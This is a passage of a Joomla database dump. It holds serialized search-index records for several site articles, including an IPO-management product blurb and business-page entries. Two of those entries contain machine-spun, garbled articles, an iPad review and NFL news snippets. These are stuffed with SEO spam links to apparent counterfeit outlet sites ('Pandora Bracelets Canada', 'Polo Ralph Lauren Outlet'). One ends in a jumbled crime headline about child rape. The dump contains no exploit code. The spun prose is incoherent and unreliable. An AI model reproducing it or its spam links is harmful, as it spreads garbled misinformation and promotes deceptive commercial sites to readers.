:4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:50:\"127:initial-public-offering-solution-ipo-manager-2\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:84:\"index.php/14-sample-data-articles/127-initial-public-offering-solution-ipo-manager-2\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=127\";s:5:\"route\";s:136:\"index.php?option=com_content&view=article&id=127:initial-public-offering-solution-ipo-manager-2&catid=14:sample-data-articles&Itemid=435\";s:5:\"title\";s:50:\"Initial Public Offering Solution (IPO Manager) (2)\";s:11:\"description\";s:877:\"a. Facilitate transaction manual and automated entry (file upload / Export) b. The system will eliminate the need to produce batch files and send it to the IPO center. Each subscription application is entered by the subscription outlet will be saved directly into the central database. c. The user entered the application can view and verify his entry, and then the manual applications will be sent to the IPO center to be validated andapproved. d. After the validation and approval of the applications by the IPO center no other alteration to the data is allowed. e. Different reports can be generated by subscription outlet to ensure the validity of their input. Also a wide range of reports can be generated by the IPO center on real time basis to check on the subscription progress. f. Can generate deferent scenarios for allotment before close thesubscription More Details\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(77,'index.php?option=com_content&view=article&id=131','index.php?option=com_content&view=article&id=131:business-pages-5&catid=84:uae&Itemid=435','bankdubi','bank dubi','2015-04-12 16:18:00','abee1d2759e6832182c8faf1035109ec',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"131\";s:5:\"alias\";s:16:\"business-pages-5\";s:7:\"summary\";s:16:\"<p>bank dubi</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-12 20:17:59\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"131:business-pages-5\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/131-business-pages-5\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=131\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=131:business-pages-5&catid=84:uae&Itemid=435\";s:5:\"title\";s:8:\"bankdubi\";s:11:\"description\";s:9:\"bank dubi\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(103,'index.php?option=com_content&view=article&id=139','index.php?option=com_content&view=article&id=139:business-pages-10&catid=84:uae&Itemid=435','ALRAMZ','Because those ask The right off the bat you see when you pick up the ipad is your own silly face.You are reproduced in the shiny black screen(If it\'s not already covered in finger prints).You stare and to your abyss as it stares into you.But an adequate a','2015-05-08 01:10:56','24792e88c2b2e1ff660809047d6f8844',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"139\";s:5:\"alias\";s:17:\"business-pages-10\";s:7:\"summary\";s:5984:\"<p>Because those ask <br /><br />The right off the bat you see when you pick up the ipad is your own silly face.You are reproduced in the shiny black screen(If it\'s not already covered in finger prints).You stare and to your abyss as it stares into you.But an adequate amount of that.I\'ll mostly put aside the ideological debate over whether the ipad is the destroyer of worlds or the changer of games.David pogue did the particular take on that, while jeff jarvis seems surprised this morning to find that the ipad is based on iphone apps and not a full computer os.Because some individuals ask, i\'ll review my actual have.<br /><br />Speed up.This can be fast, it really is instant on.And that\'s an underrated advantage.If the ipad is nearby and you like to check your e mail, just marketing, decline and tap, and you are in your e mail while the start up chime would still be chiming on a laptop.Then you\'d have to loose time waiting for your laptop\'s desktop to slowly appear, then messages about viruses and updates are you coupled to the internet yet?After that you can open an e mail program.It\'s that to feel of\"I don\'t want to use to the pc, among the best do some stuff\"That\'s the ipad\'s biggest change.It\'s more tolerable to type on the ipad that i expected, even only over the following few lying flat on a table.I was expecting it to wobble, but it i doesn\'t.I believed the angle would be bad, but all this was not.It\'s easier than cramped physical keyboard on a netbook.<br /><br />You may type standing up.When i held the tablet in family symbol mode, i should just type with my thumbs, as possibly do on an iphone.And i don\'t possess abnormally long thumbs.You would not type much this way, but who types much taking a stand anyway?Resting, you\'ll find your own beloved position.It may the knees up position demonstrated <b><a title=\"Milagrofilms\" href=\"http://www.milagrofilms.ca\">Milagrofilms</a></b> by steve jobs.I do wonder if the ipad can create a generation of children who put their feet on the coffee table.<br /><br />Updating.The ipad uses the apple apple i-Phone\'s copy paste method.It was a clever solution for touch screens and delay fine here, but it has some iphone\'s obscure limitations.Why can still not paste into an outlook web access?Unusual.Pages is a $9 piece of apple\'s iwork suite and it\'s a good start if you should do a lot of word processing.You can also buy apps to employ word or google documents.<br /><br />Assess full sizemonotasking.You can move from app to app so quickly you almost don\'t notice the lack of multi tasking.One way you can see is when you want to listen to pandora, npr or ballgames mobile while you work.If apple allows background listening besides ipod music, it would deal with nearly all multitasking complaints.Major league baseball\'s app has figured out a way to let you hear the game phone on the safari app, even when you work in any other app.Other might learn something.<br /><br />Pleased.In spite of the whiz bang demos by magazine publishers before the launch, i wasn\'t able to witness much from magazines in the app store.Popular science made the most of the ipad\'s touchscreen display, with pages that scroll up and down and sweep to and fro, while outside magazine had gorgeous photos but its layouts were static print pages that did not even seem to be sized right for the ipad screen.Marvel\'s comics app had stunning color, but it was hard to read the text and all pages and posts didn\'t zoom naturally.<br /><br />View full sizethe new york times app was a meager two not so active pages labeled editors\' choice.Usa today is earlier leader in this category.Npr, bbc and reuters had harsh apps.Ap\'s app is friendly and outstanding, with stories presented like clippings scattered all over the screen.I think i\'d rather have a more efficient list with more news per screen.<br /><br />Ibooks comes pre installed with\"Winnie all pooh\"To show off the e reader potential.You can upload free classics or buy bestsellers.The reading suffer is as good as advertised, but your eyes may need to adjust to the backlit screen, or the other way round.<br /><br />1.Apple has never been afraid to move that is a, from command lines to personal computers, and from mice and cursors to the touch pads and touch screens.Exactly what happened to the floppy disk?<br /><br />2.Apple\'s current approach can be summarized as.A core of features handled exquisitely and seamlessly, then apps for nearly devices, but some things just don\'t fully trust your fingers.Can get you an ipad app to run a computer remotely, a good pc.You might find out why a traditional main system is not well suited for your fingers.<br /><br />3.Apple still makes desktops.Apple even still makes desktop laptops.<br /><br />4.The techies are generally just lashing back at the\"This changes everything\"Ballyhoo.But don\'t they sound similar to old media?<br /><br />5.Vertical branded news sources as apps are part of a culture shift favoring the use of, but am not a savior of, news marketers.Thinking about, computers are inconvenient, the world-Wide-Web is inconvenient and some apps are handy enough to pay for.There is however one thing i noticed.The ipad is so fast inside of of itself, and its browser is so fast via internet, that all of this sweeping, zipping and zooming builds prospects.Publishers will have to sell prospective buyers that they should stop, pay <b><a title=\"Pandora Bracelets Canada\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Pandora Bracelets Canada</a></b> on the cost, wait for an download, and now they can check this out month\'s magazine.<br /><br />Ny teachers\' average salary tops nation, report findssyracuse man accused of raping girls, 2 furthermore 4, as wife held them down refuses to come to courtstate trooper dies from injuries a day after a tractor trailer hit his patrol carsyracuse man admits raping little girls as wife held them down, is maximum 27+ years in prison.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-08 05:10:55\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:21:\"139:business-pages-10\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:38:\"index.php/84-uae/139-business-pages-10\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=139\";s:5:\"route\";s:90:\"index.php?option=com_content&view=article&id=139:business-pages-10&catid=84:uae&Itemid=435\";s:5:\"title\";s:6:\"ALRAMZ\";s:11:\"description\";s:5638:\"Because those ask The right off the bat you see when you pick up the ipad is your own silly face.You are reproduced in the shiny black screen(If it\'s not already covered in finger prints).You stare and to your abyss as it stares into you.But an adequate amount of that.I\'ll mostly put aside the ideological debate over whether the ipad is the destroyer of worlds or the changer of games.David pogue did the particular take on that, while jeff jarvis seems surprised this morning to find that the ipad is based on iphone apps and not a full computer os.Because some individuals ask, i\'ll review my actual have. Speed up.This can be fast, it really is instant on.And that\'s an underrated advantage.If the ipad is nearby and you like to check your e mail, just marketing, decline and tap, and you are in your e mail while the start up chime would still be chiming on a laptop.Then you\'d have to loose time waiting for your laptop\'s desktop to slowly appear, then messages about viruses and updates are you coupled to the internet yet?After that you can open an e mail program.It\'s that to feel of\"I don\'t want to use to the pc, among the best do some stuff\"That\'s the ipad\'s biggest change.It\'s more tolerable to type on the ipad that i expected, even only over the following few lying flat on a table.I was expecting it to wobble, but it i doesn\'t.I believed the angle would be bad, but all this was not.It\'s easier than cramped physical keyboard on a netbook. You may type standing up.When i held the tablet in family symbol mode, i should just type with my thumbs, as possibly do on an iphone.And i don\'t possess abnormally long thumbs.You would not type much this way, but who types much taking a stand anyway?Resting, you\'ll find your own beloved position.It may the knees up position demonstrated Milagrofilms by steve jobs.I do wonder if the ipad can create a generation of children who put their feet on the coffee table./> Updating.The ipad uses the apple apple i-Phone\'s copy paste method.It was a clever solution for touch screens and delay fine here, but it has some iphone\'s obscure limitations.Why can still not paste into an outlook web access?Unusual.Pages is a $9 piece of apple\'s iwork suite and it\'s a good start if you should do a lot of word processing.You can also buy apps to employ word or google documents. Assess full sizemonotasking.You can move from app to app so quickly you almost don\'t notice the lack of multi tasking.One way you can see is when you want to listen to pandora, npr or ballgames mobile while you work.If apple allows background listening besides ipod music, it would deal with nearly all multitasking complaints.Major league baseball\'s app has figured out a way to let you hear the game phone on the safari app, even when you work in any other app.Other might learn something. Pleased.In spite of the whiz bang demos by magazine publishers before the launch, i wasn\'t able to witness much from magazines in the app store.Popular science made the most of the ipad\'s touchscreen display, with pages that scroll up and down and sweep to and fro, while outside magazine had gorgeous photos but its layouts were static print pages that did not even seem to be sized right for the ipad screen.Marvel\'s comics app had stunning color, but it was hard to read the text and all pages and posts didn\'t zoom naturally. View full sizethe new york times app was a meager two not so active pages labeled editors\' choice.Usa today is earlier leader in this category.Npr, bbc and reuters had harsh apps.Ap\'s app is friendly and outstanding, with stories presented like clippings scattered all over the screen.I think i\'d rather have a more efficient list with more news per screen. Ibooks comes pre installed with\"Winnie all pooh\"To show off the e reader potential.You can upload free classics or buy bestsellers.The reading suffer is as good as advertised, but your eyes may need to adjust to thebacklit screen, or the other way round. 1.Apple has never been afraid to move that is a, from command lines to personal computers, and from mice and cursors to the touch pads and touch screens.Exactly what happened to the floppy disk? 2.Apple\'s current approach can be summarized as.A core of features handled exquisitely and seamlessly, then apps for nearly devices, but some things just don\'t fully trust your fingers.Can get you an ipad app to run a computer remotely, a good pc.You might find out why a traditional main system is not well suited for your fingers. 3.Apple still makes desktops.Apple even still makes desktop laptops. 4.The techies are generally just lashing back at the\"This changes everything\"Ballyhoo.But don\'t they sound similar to old media? 5.Vertical branded news sources as apps are part of a culture shift favoring the use of, but am not a savior of, news marketers.Thinking about, computers are inconvenient, the world-Wide-Web is inconvenient and some apps are handy enough to pay for.There is however one thing i noticed.The ipad is so fast inside of of itself, and its browser is so fast via internet, that all of this sweeping, zipping and zooming builds prospects.Publishers will have to sell prospective buyers that they should stop, pay Pandora Bracelets Canada on the cost, wait for an download, and now they can check this out month\'s magazine. Ny teachers\' average salary tops nation, report findssyracuse man accused of raping girls, 2 furthermore 4, as wife held them down refuses to come to courtstate trooper dies from injuries a day after a tractor trailer hit his patrol carsyracuse man admits raping little girls as wife held them down, is maximum 27+ years in prison.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(104,'index.php?option=com_content&view=article&id=138','index.php?option=com_content&view=article&id=138:business-pages-9&catid=84:uae&Itemid=435','DLALA','Howie long takes puppet form for pizza hut super bowl large Syers, who often performs in new york square park, crafted a marionette that looks just like fox analyst howie long in four days that allows you to shoot an ad with the former raider that will ai','2015-05-11 23:49:33','6ea49639c1cace420c7cf788e86f482c',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"138\";s:5:\"alias\";s:16:\"business-pages-9\";s:7:\"summary\";s:3115:\"<p>Howie long takes puppet form for pizza hut super bowl large <br /><br />Syers, who often performs in new york square park, crafted a marionette that looks just like fox analyst howie long in four days that allows you to shoot an ad with the former raider that will air before super bowl xlviii on sunday.It usually requires syers four to five days to build his marionettes, but he usually takes a week to refine it.He wasn\'t afforded that luxury on this project.He was called on jan.14, Got verification for the ad two days later and it was filmed last Tuesday at FOX\'s temporary Times Square studio at Duffy Square.<br /><br />The puppet is a busting image of long.Syers had to cut fabric from one of his ralph lauren suits build a mini suit for the long marionette.It was 13 degrees plus wind chill for a single and a half hour shoot.<br /><br />Syers said as you\'re long saw the puppet, long considered\"I decided to seen everything in my life.It\'s true that i have, <br /><br />May very well 7, 10:36PM <br /><br />Victor cruz chooses to be a team captain <br /><br />Victor cruz made it perfectly clear on wednesday that beyond just exciting the giants offense in 2014, the 27 year old receiver also covets another fact.He wishes to be a team captain.<br /><br />\"Absolutely, cruz said in respond to a question of by ebenezer samuel <br /><br />Would probably 7, 12:58AM <br /><br />Knight in shining armor amukamara says he was\"Treated\"Giants learned option <br /><br />The giants used the fifth year option on cornerback prince amukamara\'s contract last week.Positive thing, at the same time, because amukamara wouldn\'t have been happy if they did not.<br /><br />\"For certain relieved, amukamara said the particular giants p.<br /><br />By rob vacchiano <br /><br />May likely 6, 1:22PM <br /><br />A look at several hits and misses of jerry reese\'s seven year draft <b><a title=\"http://www.ycol.co.uk/\" href=\"http://www.ycol.co.uk\">http://www.ycol.co.uk/</a></b> record <br /><br />Jerry reese, the giants\' gm, knows that in today\'s nfl there\'s bit of time for developing players especially high draft picks.And once he makes his first, second, and third round picks in the nfl draft on thurs.And friday, he aim.<br /><br />Appear full blog <br /><br />April 29, 2:28PM <br /><br />Geno smith you should take initial first team reps at minicamp <br /><br />If geno smith had been studying marty mornhinweg talk on tuesday, he can have liked what he heard.<br /><br />Smith is headed for a quarterback competition with michael vick, and mornhinweg said tuesday that smith takes the opening shot <b><a title=\"Polo Ralph Lauren Outlet\" href=\"http://www.ycol.co.uk/ralph-lauren-uk-outlet.html\">Polo Ralph Lauren Outlet</a></b> with.<br /><br />April 26, 8:24PM <br /><br />Rex ryan on drafting a protecting lineman:\'That may well funny\' <br /><br />No one knows who the jets uses in the first round of the upcoming nfl draft, but there\'s one position that seems safe to eliminate:Preventative lineman.That\'s modern strength of the jets after the team took a defensive lineman in the first ro.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-12 